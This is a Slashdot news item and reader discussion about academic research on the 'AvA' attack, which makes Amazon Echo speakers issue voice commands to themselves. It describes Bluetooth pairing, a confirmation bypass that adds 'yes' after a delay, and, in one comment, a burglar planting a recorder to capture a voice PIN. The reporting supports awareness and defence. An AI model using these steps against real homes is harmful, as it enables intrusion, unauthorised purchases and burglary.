Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror
×
Security

Attackers Can Force Amazon Echos To Hack Themselves With Self-Issued Commands (arstechnica.com) 32

Academic researchers have devised a new working exploit that commandeers Amazon Echo smart speakers and forces them to unlock doors, make phone calls and unauthorized purchases, and control furnaces, microwave ovens, and other smart appliances. joshuark shares a report: The attack works by using the device's speaker to issue voice commands. As long as the speech contains the device wake word (usually "Alexa" or "Echo") followed by a permissible command, the Echo will carry it out, researchers from Royal Holloway University in London and Italy's University of Catania found. Even when devices require verbal confirmation before executing sensitive commands, it's trivial to bypass the measure by adding the word "yes" about six seconds after issuing the command. Attackers can also exploit what the researchers call the "FVV," or full voice vulnerability, which allows Echos to make self-issued commands without temporarily reducing the device volume.

Because the hack uses Alexa functionality to force devices to make self-issued commands, the researchers have dubbed it "AvA," short for Alexa vs. Alexa. It requires only a few seconds of proximity to a vulnerable device while it's turned on so an attacker can utter a voice command instructing it to pair with an attacker's Bluetooth-enabled device. As long as the device remains within radio range of the Echo, the attacker will be able to issue commands. The attack "is the first to exploit the vulnerability of self-issuing arbitrary commands on Echo devices, allowing an attacker to control them for a prolonged amount of time," the researchers wrote in a paper [PDF] published two weeks ago. "With this work, we remove the necessity of having an external speaker near the target device, increasing the overall likelihood of the attack."

This discussion has been archived. No new comments can be posted.

Attackers Can Force Amazon Echos To Hack Themselves With Self-Issued Commands

Comments Filter:
  • I've looked into smart locks (I admit, I don't own one), but most of them require a pin if you're unlocking via voice and Google smart speakers-- does Alexa not have this basic functionality?

    • Not having looked into the question for 20-odd years (and none of the reliability issues have changed since then) I don't know how these things are meant to work now. When I last looked at it, electronic door locks were one thing, and how you drove the "unlatch" line was up to you - padlocked switch, highly trained wombat, whatever.

      Are Amazon (or Google - and whoever else is in this market) now selling their own lines of integrated home automation products? With their reputation for sloppy, insecure progra

  • So if you want the Echo to unlock the front door, you can get inside first, pair your phone with the device when the owner isn't paying attention, then later use it to send commands to do things like unlock the door. So either you've already broken in, or you've been allowed in at some point.

    But if the front door lock is controlled by the Echo, just move to the nearest window to the device and yell at it. You'll get enough sound through the window to activate it, and it will let you in. Much simpler.

    • by hab136 ( 30884 )

      >But if the front door lock is controlled by the Echo, just move to the nearest window to the device and yell at it.

      There's a toggle in Alexa for my smart lock that controls whether it can be unlocked by voice. It's off by default and gives you a big warning if you try to enable it.

      If you do ignore the warning and enable unlocking by voice, you have to also set a 4-digit "voice confirmation code".

      So yes, yelling attacks will work.. if the attacker also yells the PIN, and the homeowner has turned that fe

      • That "yelling the confirmation code on your front doorstep is a bit of a weak point.
        • Burglar sees a rich-looking house while scouting an area.
        • Burglar clutches copy of "Murderer for Jesus" or some such pamphlet in one hand, and covert Voice-Activated Recorder in the other.
        • Rings on doorbell, crouches down to fiddle with shoe laces - and place the VAR with the other.
        • If someone answers the door - or nosy neighbour intervenes - burglar spins a line about "Suicide for God" or something equally plausible until th
  • Alexa. Say, "Alexa."

    --
    "10 Goto 10" - Everybody

    • It'll tell you how to pronounce "Alexa"
    • Another way to combat this exploit is to change the wake word for Alexa. By going into the settings, you can change the wake word from Alexa to Ziggy, Echo, Amazon or Computer. You have to do this to each device separately but it stops inadvertent triggering from the TV, radio, or video calls.

  • Alexa kill kenny

  • Any attack that requires physical or nearby access is both obvious and unimportant.
  • Alexa go to defcon 1!

  • Read it carefully. What the headline gives, the details cancel.

    The attack begins by first being able to connect your attacking device by Bluetooth. If the person can already attach to Bluetooth they're close enough for all kinds of other attacks, and the device hadn't been secured to begin with. So step 1 of the attack is to have an insecure device. Plenty of those out there with default passwords and all, but that's not much of a vulnerability. Might as well say that systems with passwords like "password" allow for easy break-ins.

    After they've attached to the device that wasn't secure, using text-to-speech it follows a pattern the device has already implemented from time to time, such as limiting specific frequencies. That's how they got it to stop responding to commercials that shouted "hey, Alexa!", the commercials wouldn't use those frequencies so the device would recognize it wasn't an actual human. The same could be done with the speakers -- and has been done in many other voice recognizing machines -- to simply not output those frequencies. A little coordination with the other smart speaker makers and they could all agree on a list of frequencies to omit, securing them from device-to-device attacks.

    The "mask attack" they describe is a security flaw that should be addressed, but it's a MitM attack requiring the connection to an already compromised device. If you've already breached the insecure device, further attacks that rely on the breach aren't that big of news.

    • The attack begins by first being able to connect your attacking device by Bluetooth. If the person can already attach to Bluetooth they're close enough for all kinds of other attacks, and the device hadn't been secured to begin with. So step 1 of the attack is to have an insecure device.

      I think you're missing the point, Bluetooth pair once when you're inside the home, then you can control the device from outside the home at Bluetooth range, say the front porch.

      What other attacks are we comparing this to inside the house, someone making a copy of your house keys, leaving a back window unlocked?

      I don't think a new vector on par with those, that most people are unaware of, is something to brush off. People are at least aware of the leave a window unlocked trick. Copying a key is too much ef

      • by nasch ( 598556 )

        Seems like there should be some kind of code required to pair to the smart device, just like there is for wifi. Rather than letting just anyone in range control a security system.

        • by ufgrat ( 6245202 )

          Oh, there is. Bluetooth pairing requires a pin of at least 4 digits. Unfortunately, because most people are stupid, and can't manage to remember a 4 digit number, most devices default to "0000" or "1234", thereby rendering the security step completely irrelevant.

    • According to my wife, who trusts Alexa enough to have one in just about every room in the house (but not my office, thankyouverymuch), you don't "pair" your phone with the Echo at all. You have to install their app onto your phone and then use the app to log in to the device owner's account. So no, Alexa doesn't just randomly pair with any phone within range.

      If you are so vulnerable that an intruder could gain physical access to your Echo device and get hold of your Amazon login credentials, you have bigg

    • by gweihir ( 88907 )

      Read it carefully. What the headline gives, the details cancel.

      The attack begins by first being able to connect your attacking device by Bluetooth. If the person can already attach to Bluetooth they're close enough for all kinds of other attacks, and the device hadn't been secured to begin with.

      Pretty much doable by a hacked smartphone that was left close enough. Many people will have set up a pairing already, so this is not an exotic attack.

    • by sperm ( 916223 )

      While not perfect and by no means stopping this kind of attack, setting up and using Alexa Guard can be useful.

    • such as limiting specific frequencies. That's how they got it to stop responding to commercials that shouted "hey, Alexa!", the commercials wouldn't use those frequencies so the device would recognize it wasn't an actual human.

      So, people with a variety of non-standard speech profiles won't be able to use Alexa. Big fucking surprise there.

      And you've a tremendous confidence in the accuracy of speakers in general and their ability to not impose their own frequency shifts and blurring on on imposed signals. I'

  • Ok then. Thanks for wasting my time.
  • I don't want any voice-enabled or even smart devices in my house. Who's laughing now? Common sense wins again.

  • Any halfway sane design would prevent self-commanding. Apparently, Alexa is designed by amateurs with not the least clue about real-world IT security. My take is that it only took so long to find this because nobody expected a flaw this exceptionally stupid.

    • It seems that the Alexa designers want to have voice commands from authorised users (as a product feature) but not have voice commands from unauthorised users. That means an authorisation-checking stage, and quite early in the process.

      Typically authorisation depends on something the authorised know (e.g. passwords) or have (RFID, NFC, or even Bluetooth tokens) which the unauthorised don't know or have. From discussions upthread, this Bluetooth authorisation thing seems to at least attempt that, if not nece

  • Anybody who's spoken to Alexa Ray Joel (one hit wonder in the US, and daughter of singer Billy Joel) knows she yells commands to Alexa whenever she talks on the phone, because the caller might slip and fire up their Alexa device while talking to her. I'm sure all girls named Alexa do the same thing...

  • No smart devices in my home, no way I'm allowing any possible hacking, listening. tattling, observing by smart devices !

Real Users know your home telephone number.

Working...